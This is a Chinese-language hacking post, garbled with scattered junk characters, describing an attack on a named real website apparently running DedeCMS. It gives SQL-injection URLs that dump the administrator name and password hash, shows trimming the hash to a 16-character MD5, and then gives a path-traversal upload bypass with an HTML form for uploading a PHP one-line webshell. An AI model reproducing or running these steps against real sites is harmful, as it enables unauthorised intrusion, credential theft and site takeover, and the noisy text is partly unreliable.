①注入漏洞。" ~1 u; w7 G; C4 U" `1 R( r2 Y
这站 http://www.political-security.com/) j) i p) M$ ]2 @; }
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,' K4 W8 ^& {$ f f
www.political-security.com/data/mysql_error_trace.inc 爆后台
' m+ L, i$ j( \* {5 y然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。/ o' L. i% e/ C! i9 `
然后写上语句 . s2 M7 p$ B2 x1 E% @
查看管理员帐号& X# p; i2 _) i# o( n' q7 }3 s6 l
http://www.political-security.co ... &membergroup=@`4 y: y5 o) @1 @4 \) T
2 |8 `/ l0 m6 ]+ ^$ v
admin
( i! ^1 G2 p. K
7 n) m# k; M) u/ P- O查看管理员密码% H7 m0 S7 {1 f* T
http://www.political-security.co ... &membergroup=@`
; g) P8 ~6 C' j& r1 q6 r# _/ ^ |& l, _% I \
8d29b1ef9f8c5a5af429
; m9 ?+ }8 h5 x. f0 h6 ?; d: R
7 J! R- { W, F查看管理员密码% @8 y/ D& W$ C- l
; `5 _! B+ `' c& M! J$ M% H& Y3 N4 ~得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
' Q0 t, s1 [' t# T$ S2 O
* Y, S: _8 f/ t& X3 k" r' E5 }* V& c8d2
9 N& ~/ j: F' \9b1ef9f8c5a5af42
+ U, k' F4 Z/ x6 p9) ~9 f2 X2 A5 G1 G
% E) I, U# X, T0 H' F
cmd5没解出来 只好测试第二个方法3 d4 o) C6 @" h6 h
& u9 ~3 @+ d9 q" @8 T; i9 h# K# M# E( S4 ~. H: k3 \% B
②上传漏洞:
/ f& { q# Q+ ]: M
/ y& d6 T1 @1 G, c3 b只要登陆会员中心,然后访问页面链接
2 \0 j8 V; R9 {“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”7 M0 b9 m/ {8 y" f) v: K# \
% u$ K# y3 F# k2 i7 L$ J% s3 @
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”: g M B% I! G D
) u& @6 b- U/ ^( K于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
8 T) U/ Y1 ]' p5 } K( E7 ~0 B2 O' [" K2 ^4 n% y4 a; u
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
+ E: K- ~$ \$ w# N! ^: i+ s y或者
* i) k3 n# g4 D/ P7 t即可上传成功 |